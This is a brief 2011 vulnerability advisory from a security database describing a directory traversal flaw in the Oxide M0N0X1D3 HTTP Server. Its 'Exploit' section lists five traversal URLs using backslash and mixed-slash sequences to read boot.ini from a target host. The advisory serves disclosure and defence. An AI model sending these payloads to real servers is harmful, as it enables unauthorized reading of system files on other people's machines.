Oxide M0N0X1D3 HTTP Server Directory Traversal Vulnerability

2011-12-05T00:00:00
ID SECURITYVULNS:DOC:27404
Type securityvulns
Reporter Securityvulns
Modified 2011-12-05T00:00:00

Description

Title : Oxide M0N0X1D3 HTTP Server Directory Traversal Vulnerability Software : Oxide M0N0X1D3 HTTP Server Software Version : 20040223 Vendor: http://sourceforge.net/projects/oxide-ws/ Vulnerability Published : 2011-11-15 Vulnerability Update Time : Status : Impact : Medium Bug Description : Oxide M0N0X1D3 HTTP Server does not properly sanitise filenames containing directory traversal sequences that are received from an HTTP Browser. Exploit :


http://target/..\..\..\boot.ini http://target/..\\..\\..\\boot.ini http://target/..\/..\/..\/boot.ini http://target//..\/..\/..\boot.ini http://target/.\..\.\..\.\..\boot.ini .


Credits : This vulnerability was discovered by demonalex(at)163(dot)com Pentester/Researcher Dark2S Security Team/PolyU.HK